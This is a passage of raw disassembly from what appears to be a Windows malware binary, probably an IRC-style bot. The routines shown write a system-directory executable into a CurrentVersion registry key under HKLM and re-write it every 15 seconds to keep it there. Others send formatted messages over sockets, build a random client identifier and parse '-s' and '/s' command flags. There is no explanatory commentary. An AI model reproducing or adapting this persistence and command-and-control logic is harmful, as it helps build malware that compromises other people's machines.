loc_416C9B: ; CODE XREF: sub_416C60+29�j
; sub_416C60+31�j
cmp ebp, edi
jb loc_416D3F
loc_416CA3: ; CODE XREF: sub_416C60+D9�j
push edi
lea edx, [ebx+eax+50h]
push esi
push edx
call sub_407BF0
add esi, edi
add esp, 0Ch
sub ebp, edi
mov [esp+1Ch+var_4], esi
mov [esp+1Ch+arg_0], ebp
mov edi, 80h
mov [esp+1Ch+var_8], 0
mov esi, 10h
lea edx, [ebx+0D0h]
loc_416CD6: ; CODE XREF: sub_416C60+BC�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov ebx, eax
sub esi, 1
ror ebx, 8
and ebx, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or ebx, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or ebx, ecx
test esi, esi
mov [edx], eax
mov [edx+4], ebx
jnz short loc_416CD6
mov ebx, [esp+1Ch+arg_4]
push ebx
call sub_4143D0
mov ebp, [esp+20h+arg_0]
mov eax, [esp+20h+var_8]
mov esi, [esp+20h+var_4]
add esp, 4
cmp ebp, edi
jnb loc_416CA3
loc_416D3F: ; CODE XREF: sub_416C60+3D�j
push ebp
lea edx, [eax+ebx+50h]
push esi
push edx
call sub_407BF0
add esp, 0Ch
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_416C60 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push eax
call sub_416AE0
add esp, 4
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D6C proc near ; CODE XREF: sub_416D6C+D5�p
; sub_41A9DE+67F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_416D85
mov ecx, [ebp+arg_4]
shr ecx, 18h
or cl, 1
jmp short loc_416D8B
; ---------------------------------------------------------------------------
loc_416D85: ; CODE XREF: sub_416D6C+C�j
mov cl, byte ptr [ebp+arg_4+3]
and cl, 0FEh
loc_416D8B: ; CODE XREF: sub_416D6C+17�j
movzx eax, word ptr [ebp+arg_24]
mov ebx, [ebp+arg_20]
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_416DA8
lea edx, [ebx+18h]
mov [ebp+arg_14], ebx
or cl, 2
mov [ebp+arg_2B], 0
jmp short loc_416DB9
; ---------------------------------------------------------------------------
loc_416DA8: ; CODE XREF: sub_416D6C+2B�j
mov dx, word ptr [ebp+arg_24]
add eax, 0FFFFFFE8h
mov [ebp+arg_14], eax
and cl, 0FDh
mov [ebp+arg_2B], 1
loc_416DB9: ; CODE XREF: sub_416D6C+3A�j
movzx eax, dx
push eax
mov byte ptr [ebp+arg_4+3], cl
mov [ebp+arg_C], dx
mov [ebp+var_4], eax
call sub_4036E0
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_416E58
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_407BF0
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz short loc_416E4F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_416E4F
push [ebp+arg_20]
call sub_403603
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_416E4B
push 0
push [ebp+arg_24]
sub ebx, edi
push ebx
add edi, esi
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
lea esi, [ebp+arg_4]
rep movsd
call sub_416D6C
add esp, 2Ch
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4B: ; CODE XREF: sub_416D6C+B8�j
mov al, 1
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4F: ; CODE XREF: sub_416D6C+A1�j
; sub_416D6C+A9�j
push [ebp+arg_20]
call sub_403603
pop ecx
loc_416E58: ; CODE XREF: sub_416D6C+66�j
xor al, al
loc_416E5A: ; CODE XREF: sub_416D6C+DD�j
; sub_416D6C+E1�j
pop edi
pop esi
pop ebx
leave
retn
sub_416D6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E5F proc near ; CODE XREF: sub_416F86+154�p
; sub_417119+152�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_0]
push 80000002h
call ds:dword_41D004 ; RegCreateKeyExA
test eax, eax
jz short loc_416E94
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
xor al, al
loc_416E91: ; CODE XREF: sub_416E5F+68�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416E94: ; CODE XREF: sub_416E5F+25�j
mov eax, [ebp+arg_8]
push esi
lea esi, [eax+1]
loc_416E9B: ; CODE XREF: sub_416E5F+41�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_416E9B
sub eax, esi
push eax
push [ebp+arg_8]
push 1
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_41D00C ; RegSetValueExA
test eax, eax
pop esi
jz short loc_416EC9
loc_416EBC: ; CODE XREF: sub_416E5F+6C�j
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
mov al, bl
jmp short loc_416E91
; ---------------------------------------------------------------------------
loc_416EC9: ; CODE XREF: sub_416E5F+5B�j
mov bl, 1
jmp short loc_416EBC
sub_416E5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ECD proc near ; CODE XREF: sub_416F86+113�p
; sub_417119+100�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 1
push 0
push [ebp+arg_4]
push 80000002h
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz short loc_416F15
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+arg_0]
push eax
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D008 ; RegQueryValueExA
test eax, eax
jnz short loc_416F15
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_416F15: ; CODE XREF: sub_416ECD+1C�j
; sub_416ECD+39�j
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
push [ebp+arg_10]
push 0
push [ebp+arg_C]
call sub_407B70
add esp, 0Ch
xor al, al
leave
retn
sub_416ECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F32 proc near ; CODE XREF: sub_419477+134�p
; sub_419A9F+F2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D004 ; RegCreateKeyExA
test eax, eax
jz short loc_416F65
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
xor al, al
loc_416F62: ; CODE XREF: sub_416F32+4E�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416F65: ; CODE XREF: sub_416F32+23�j
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D000 ; RegDeleteValueA
test eax, eax
jz short loc_416F82
loc_416F75: ; CODE XREF: sub_416F32+52�j
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
mov al, bl
jmp short loc_416F62
; ---------------------------------------------------------------------------
loc_416F82: ; CODE XREF: sub_416F32+41�j
mov bl, 1
jmp short loc_416F75
sub_416F32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=94h
sub_416F86 proc near ; CODE XREF: .text:loc_41BF0D�p
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-94h]
sub esp, 114h
mov eax, dword_423064
xor eax, ebp
mov [ebp+94h+var_4], eax
push ebx
push esi
push edi
mov edi, 100h
push edi
call sub_402648
mov esi, eax
push edi
mov [ebp+94h+var_110], esi
call sub_402648
push edi
mov [ebp+94h+var_108], eax
call sub_402648
push edi
mov [ebp+94h+var_114], eax
call sub_402648
push [ebp+94h+var_114]
mov [ebp+94h+var_10C], eax
call sub_402A45
push eax
xor ebx, ebx
push ebx
push [ebp+94h+var_114]
call sub_407B70
push [ebp+94h+var_10C]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_10C]
call sub_407B70
push edi
lea eax, [ebp+94h+var_104]
push ebx
push eax
call sub_407B70
push esi
call sub_402A45
add esp, 40h
push eax
push ebx
push esi
call sub_407B70
push [ebp+94h+var_108]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_108]
call sub_407B70
push esi
call sub_402A45
push eax
mov ebx, offset byte_425119
call sub_4196D1
mov esi, [ebp+94h+var_108]
push esi
call sub_402A45
push eax
mov ebx, offset byte_425061
call sub_4196D1
mov ebx, [ebp+94h+var_114]
push ebx
call sub_402A45
add esp, 30h
dec eax
push eax
push ebx
call ds:dword_41D0F4 ; GetSystemDirectoryA
push esi
mov esi, [ebp+94h+var_10C]
push ebx
push offset aSS_11 ; "%s\\%s"
push esi
call sub_402A45
pop ecx
dec eax
push eax
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41707E: ; CODE XREF: sub_416F86+FD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41707E
sub eax, ecx
push edi
mov [eax+esi], dl
lea eax, [ebp+94h+var_104]
push eax
push [ebp+94h+var_110]
push offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_4170D1
lea eax, [ebp+94h+var_104]
mov ecx, esi
loc_4170AA: ; CODE XREF: sub_416F86+13C�j
mov dl, [ecx]
cmp dl, [eax]
jnz short loc_4170C8
test dl, dl
jz short loc_4170C4
mov dl, [ecx+1]
cmp dl, [eax+1]
jnz short loc_4170C8
inc ecx
inc ecx
inc eax
inc eax
test dl, dl
jnz short loc_4170AA
loc_4170C4: ; CODE XREF: sub_416F86+12C�j
xor eax, eax
jmp short loc_4170CD
; ---------------------------------------------------------------------------
loc_4170C8: ; CODE XREF: sub_416F86+128�j
; sub_416F86+134�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4170CD: ; CODE XREF: sub_416F86+140�j
test eax, eax
jz short loc_4170E2
loc_4170D1: ; CODE XREF: sub_416F86+11D�j
push esi
push [ebp+94h+var_110]
push offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_4170E2: ; CODE XREF: sub_416F86+149�j
push [ebp+94h+var_110]
call sub_402B9B
push [ebp+94h+var_108]
call sub_402B9B
push ebx
call sub_402B9B
push esi
call sub_402B9B
mov ecx, [ebp+94h+var_4]
add esp, 10h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 94h
leave
retn
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_417119 proc near ; DATA XREF: .text:0041BF1E�o
var_504 = byte ptr -504h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_304 = byte ptr -304h
var_303 = byte ptr -303h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 504h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 0FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push esi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
push esi
lea eax, [ebp+var_303]
push ebx
push eax
mov [ebp+var_304], bl
call sub_407B70
push esi
lea eax, [ebp+var_103]
push ebx
push eax
mov [ebp+var_104], bl
call sub_407B70
add esp, 30h
mov edi, 100h
loc_41718E: ; CODE XREF: sub_417119+1AE�j
push edi
lea esi, [ebp+var_204]
mov ebx, offset byte_425119
call sub_4196D1
push edi
lea esi, [ebp+var_404]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
pop ecx
mov esi, 0FFh
push esi
lea eax, [ebp+var_304]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
lea eax, [ebp+var_404]
push eax
lea eax, [ebp+var_304]
push eax
push offset aSS ; "%s\\%s"
lea eax, [ebp+var_104]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_104]
add esp, 14h
lea ecx, [eax+1]
loc_4171F1: ; CODE XREF: sub_417119+DD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4171F1
sub eax, ecx
xor ebx, ebx
mov [ebp+eax+var_104], bl
push edi
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_417258
lea ecx, [ebp+var_504]
lea eax, [ebp+var_104]
loc_417231: ; CODE XREF: sub_417119+130�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_41724F
cmp dl, bl
jz short loc_41724B
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_41724F
inc eax
inc eax
inc ecx
inc ecx
cmp dl, bl
jnz short loc_417231
loc_41724B: ; CODE XREF: sub_417119+120�j
xor eax, eax
jmp short loc_417254
; ---------------------------------------------------------------------------
loc_41724F: ; CODE XREF: sub_417119+11C�j
; sub_417119+128�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417254: ; CODE XREF: sub_417119+134�j
cmp eax, ebx
jz short loc_417273
loc_417258: ; CODE XREF: sub_417119+10A�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_417273: ; CODE XREF: sub_417119+13D�j
push edi
lea eax, [ebp+var_304]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_104]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_504]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_204]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_404]
push ebx
push eax
call sub_407B70
add esp, 3Ch
push 3A98h
call ds:dword_41D0FC ; Sleep
jmp loc_41718E
sub_417119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172CC proc near ; CODE XREF: sub_41783D+24F�p
; sub_41783D+323�p ...
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
mov esi, 1FFh
push esi
lea eax, [ebp+var_203]
push 0
push eax
mov [ebp+var_204], 0
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_204]
push esi
push eax
call sub_403436
lea eax, [ebp+var_204]
add esp, 1Ch
lea esi, [eax+1]
loc_41731B: ; CODE XREF: sub_4172CC+54�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41731B
sub eax, esi
mov [ebp+eax+var_204], cl
lea eax, [ebp+var_204]
lea esi, [eax+1]
loc_417334: ; CODE XREF: sub_4172CC+6D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417334
push 0
sub eax, esi
push eax
lea eax, [ebp+var_204]
push eax
push dword ptr [edi]
call ds:dword_41D228 ; send
mov ecx, [ebp+var_4]
test eax, eax
setnz al
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_4172CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417361 proc near ; CODE XREF: sub_40177B+268�p
; sub_4019F3+21A�p ...
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 40Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_408], eax
mov eax, [ebp+arg_8]
mov edi, 1FFh
xor ebx, ebx
push edi
mov [ebp+var_40C], eax
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push edi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
add esp, 18h
cmp [ebp+arg_4], 1
jz loc_41747D
push esi
push 0Dh
call sub_402648
mov esi, eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_404]
push edi
push eax
call sub_403436
lea eax, [ebp+var_404]
add esp, 14h
lea ecx, [eax+1]
loc_4173EE: ; CODE XREF: sub_417361+92�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4173EE
sub eax, ecx
push esi
mov [ebp+eax+var_404], bl
call sub_402A45
push eax
mov ebx, offset asc_425570 ; "ÅÇÜÃØÆÒ"
call sub_4196D1
lea eax, [ebp+var_404]
push eax
push [ebp+var_40C]
lea eax, [ebp+var_204]
push esi
push offset aSSS ; "%s %s %s\r\n"
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_204]
add esp, 20h
lea ecx, [eax+1]
loc_41743B: ; CODE XREF: sub_417361+DF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41743B
sub eax, ecx
push esi
mov [ebp+eax+var_204], dl
call sub_402B9B
pop ecx
lea eax, [ebp+var_204]
lea ecx, [eax+1]
pop esi
loc_41745C: ; CODE XREF: sub_417361+100�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41745C
sub eax, ecx
push 0
push eax
lea eax, [ebp+var_204]
push eax
mov eax, [ebp+var_408]
push dword ptr [eax]
call ds:dword_41D228 ; send
loc_41747D: ; CODE XREF: sub_417361+5D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41748B proc near ; CODE XREF: sub_41802F+23B�p
; sub_41829C+39�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor eax, eax
mov [ebp+var_40], 0
lea edi, [ebp+var_3F]
stosw
stosb
push 0Dh
pop ecx
mov esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
lea edi, [ebp+var_3C]
rep movsd
lea eax, [ebp+var_48]
push eax
movsb
call ds:dword_41D1EC ; GetCursorPos
call ds:dword_41D108 ; GetTickCount
mov ecx, [ebp+var_48]
mov edx, [ebp+var_44]
add ecx, edx
cmp eax, ecx
jb short loc_4174D7
add ecx, eax
jmp short loc_4174D9
; ---------------------------------------------------------------------------
loc_4174D7: ; CODE XREF: sub_41748B+46�j
sub ecx, eax
loc_4174D9: ; CODE XREF: sub_41748B+4A�j
push ecx
call sub_403356
pop ecx
push 8
pop ecx
xor eax, eax
mov edi, ebx
rep stosd
push offset asc_420310 ; "["
stosw
push 22h
push ebx
stosb
call sub_402AEE
mov eax, ebx
add esp, 0Ch
lea esi, [eax+1]
loc_417501: ; CODE XREF: sub_41748B+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417501
xor edi, edi
sub eax, esi
push edi
mov [eax+ebx], cl
push 4
pop ecx
lea esi, [ebp+var_40]
call sub_418E51
pop ecx
mov eax, esi
push eax
push ebx
push offset aSS_0 ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea esi, [eax+1]
loc_417535: ; CODE XREF: sub_41748B+AF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417535
sub eax, esi
push edi
push 4
lea esi, [ebp+var_40]
mov [eax+ebx], cl
call sub_418E1F
mov eax, esi
push eax
push ebx
push offset aSS_1 ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea esi, [eax+1]
loc_417565: ; CODE XREF: sub_41748B+DF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417565
sub eax, esi
mov [eax+ebx], cl
call sub_419347
test al, al
jz short loc_41759C
push ebx
push offset aSp ; "%sP|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_417590: ; CODE XREF: sub_41748B+10A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417590
sub eax, esi
mov [eax+ebx], cl
loc_41759C: ; CODE XREF: sub_41748B+ED�j
call sub_418DA0
mov eax, dword_42659C
cmp eax, edi
mov ecx, dword_426598
jg short loc_4175D8
jl short loc_4175B7
cmp ecx, 0Ah
jnb short loc_4175D8
loc_4175B7: ; CODE XREF: sub_41748B+125�j
push eax
push ecx
push ebx
push offset aS0I64u ; "%s0%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175CF: ; CODE XREF: sub_41748B+149�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175CF
jmp short loc_4175F7
; ---------------------------------------------------------------------------
loc_4175D8: ; CODE XREF: sub_41748B+123�j
; sub_41748B+12A�j
push eax
push ecx
push ebx
push offset aSI64u ; "%s%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175F0: ; CODE XREF: sub_41748B+16A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175F0
loc_4175F7: ; CODE XREF: sub_41748B+14B�j
sub eax, esi
mov byte ptr [eax+ebx], 0
xor esi, esi
cmp dword_42521C, edi
jle short loc_417644
loc_417607: ; CODE XREF: sub_41748B+1B7�j
call sub_403363
push 31h
pop ecx
xor edx, edx
div ecx
movsx eax, [ebp+edx+var_3C]
push eax
push ebx
push offset aSC ; "%s%c"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea edi, [eax+1]
loc_41762F: ; CODE XREF: sub_41748B+1A9�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41762F
sub eax, edi
inc esi
mov [eax+ebx], cl
cmp esi, dword_42521C
jl short loc_417607
loc_417644: ; CODE XREF: sub_41748B+17A�j
push ebx
push offset aS_3 ; "%s]"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_41765A: ; CODE XREF: sub_41748B+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41765A
sub eax, esi
mov [eax+ebx], cl
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
mov eax, ebx
pop esi
call sub_402710
leave
retn
sub_41748B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417676 proc near ; CODE XREF: sub_41783D+6A7�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 824h
push ebx
push esi
push edi
push offset asc_4202C8 ; " "
push [ebp+arg_14]
xor ebx, ebx
mov byte ptr [ebp+var_8], 0
mov [ebp+var_4], ebx
call sub_403A34
jmp short loc_4176D8
; ---------------------------------------------------------------------------
loc_41769A: ; CODE XREF: sub_417676+68�j
mov eax, [ebp+var_4]
push offset aS_16 ; "-s"
push esi
mov [ebp+eax*4+var_820], esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_4176C6
push offset aS_17 ; "/s"
push esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz short loc_4176CA
loc_4176C6: ; CODE XREF: sub_417676+3D�j
mov byte ptr [ebp+var_8], 1
loc_4176CA: ; CODE XREF: sub_417676+4E�j
push offset asc_4202D4 ; " "
push ebx
call sub_403A34
inc [ebp+var_4]
loc_4176D8: ; CODE XREF: sub_417676+22�j
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_41769A
mov edi, [ebp+arg_0]
mov esi, [ebp+var_820]
add edi, 5
mov edx, edi
mov ecx, esi
loc_4176F0: ; CODE XREF: sub_417676+92�j
mov al, [ecx]
cmp al, [edx]
jnz short loc_41770E
test al, al
jz short loc_41770A
mov al, [ecx+1]
cmp al, [edx+1]
jnz short loc_41770E
inc ecx
inc ecx
inc edx
inc edx
test al, al
jnz short loc_4176F0
loc_41770A: ; CODE XREF: sub_417676+82�j
xor eax, eax
jmp short loc_417713
; ---------------------------------------------------------------------------
loc_41770E: ; CODE XREF: sub_417676+7E�j
; sub_417676+8A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417713: ; CODE XREF: sub_417676+96�j
cmp eax, ebx
jz short loc_417724
mov eax, edi
mov ecx, esi
call sub_419044
test eax, eax
jz short loc_417750
loc_417724: ; CODE XREF: sub_417676+9F�j
xor eax, eax
cmp [ebp+var_4], ebx
jle short loc_41774D
mov ecx, [ebp+var_4]
dec ecx
loc_41772F: ; CODE XREF: sub_417676+CF�j
cmp eax, ecx
jz short loc_417741
mov edx, [ebp+eax*4+var_81C]
mov [ebp+eax*4+var_820], edx
loc_417741: ; CODE XREF: sub_417676+BB�j
inc eax
cmp eax, [ebp+var_4]
jl short loc_41772F
mov esi, [ebp+var_820]
loc_41774D: ; CODE XREF: sub_417676+B3�j
dec [ebp+var_4]
loc_417750: ; CODE XREF: sub_417676+AC�j
cmp byte ptr [ebp+var_8], bl
jz short loc_417758
dec [ebp+var_4]
loc_417758: ; CODE XREF: sub_417676+DD�j
mov al, [esi]
cmp al, byte_424FE8
jnz loc_417836
mov eax, esi
lea ecx, [eax+1]
loc_41776B: ; CODE XREF: sub_417676+FA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41776B
sub eax, ecx
push eax
lea eax, [esi+1]
push eax
push esi
call sub_403910
mov eax, dword_433C40
mov esi, [eax]
mov ebx, offset dword_433C3C
mov edi, ebx
add esp, 0Ch
mov [ebp+var_C], esi
mov [ebp+var_10], edi
loc_417796: ; CODE XREF: sub_417676+192�j
test edi, edi
mov eax, dword_433C40
mov [ebp+var_14], eax
jz short loc_4177A6
cmp edi, ebx
jz short loc_4177AB
loc_4177A6: ; CODE XREF: sub_417676+12A�j
call sub_402F5D
loc_4177AB: ; CODE XREF: sub_417676+12E�j
cmp esi, [ebp+var_14]
jz loc_417836
test edi, edi
jnz short loc_4177BD
call sub_402F5D
loc_4177BD: ; CODE XREF: sub_417676+140�j
cmp esi, [edi+4]
jnz short loc_4177C7
call sub_402F5D
loc_4177C7: ; CODE XREF: sub_417676+14A�j
mov ecx, [ebp+var_820]
lea eax, [esi+0Ch]
loc_4177D0: ; CODE XREF: sub_417676+172�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_4177EE
test dl, dl
jz short loc_4177EA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_4177EE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_4177D0
loc_4177EA: ; CODE XREF: sub_417676+162�j
xor eax, eax
jmp short loc_4177F3
; ---------------------------------------------------------------------------
loc_4177EE: ; CODE XREF: sub_417676+15E�j
; sub_417676+16A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4177F3: ; CODE XREF: sub_417676+176�j
test eax, eax
jz short loc_41780A
lea edi, [ebp+var_20]
lea esi, [ebp+var_10]
call sub_40168C
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jmp short loc_417796
; ---------------------------------------------------------------------------
loc_41780A: ; CODE XREF: sub_417676+17F�j
cmp esi, [edi+4]
jnz short loc_417814
call sub_402F5D
loc_417814: ; CODE XREF: sub_417676+197�j
mov ecx, [esi+8]
mov eax, [ecx]
